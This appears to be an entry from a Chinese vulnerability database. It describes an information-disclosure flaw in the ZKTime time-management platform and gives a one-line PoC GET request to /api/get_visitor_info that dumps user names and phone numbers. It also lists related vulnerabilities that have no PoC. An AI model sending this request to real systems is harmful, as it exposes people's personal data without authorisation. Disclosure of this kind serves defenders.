漏洞描述
ZKTime 时间精细化管理平台以时间管理作为专业管理方向,环绕六大维度,结合时间、计算、存储三大互联网应用核心要素,以多模态BioCV、物联感知技术和连接能力融入软硬件,为企业带来高安全、实人化、高效率、智慧规范的全新的组织运营管控体验,三者结合提高平台的企业管理实力,最终实现企业/单位的精细化运营管理。攻击者通过构造特殊URL地址,读取用户姓名(ENAME)、手机号码(Mobile、Tele)并显示,导致用户敏感信息泄露。
ZKTime 时间精细化管理平台 /api/get_visitor_info 信息泄露漏洞
PoC代码
GET /api/get_visitor_info?table=userinfo HTTP/1.1相关漏洞推荐
-
ZKTime 考勤管理系统 /iclock/ic1ock SQL 注入漏洞 无POC
2025-07-08 | ZKTimeZKTime 时间精细化管理平台以时间管理作为专业管理方向,环绕六大维度,结合时间、计算、存储三大互联网应用核心要素,以多模态BioCV、物联感知技术和连接能力融入软硬件,为企业带来高安全、实人化、高... -
Zktime 考勤管理系统ic1ock存在SQL注入漏洞 无POC
2024-08-19 | Zktime考勤管理系统ZKTime时间精细化管理平台以时间管理作为专业管理方向,环绕六大维度,结合时间、计算、存储三大互联网应用核心要素,最终实现企业/单位的精细化运营管理。ic1ock接口存在SQL注入漏洞,攻击者可借此... -
(ZKTime)安全精细化管理平台 get_visitor_info 接口存在信息泄露 无POC
2024-08-09 | ZKTime熵基科技时间&安全精细化管理平台(ZKTime)是熵基科技股份有限公司推出的时间管理类企业用管理软件,在网络上存在广泛应用。该系统存在信息泄露漏洞,可获取用户姓名 -
SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC
2025-09-22 00:22:31 | SourceCodester Pet Grooming Management SoftwareSourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo... -
D-Link DIR-645 命令注入漏洞 无POC
2025-09-22 00:22:31 | D-Link DIR-645D-Link DIR-645是中国友讯(D-Link)公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞,该漏洞源于对文件/soap.cgi中参数service的错...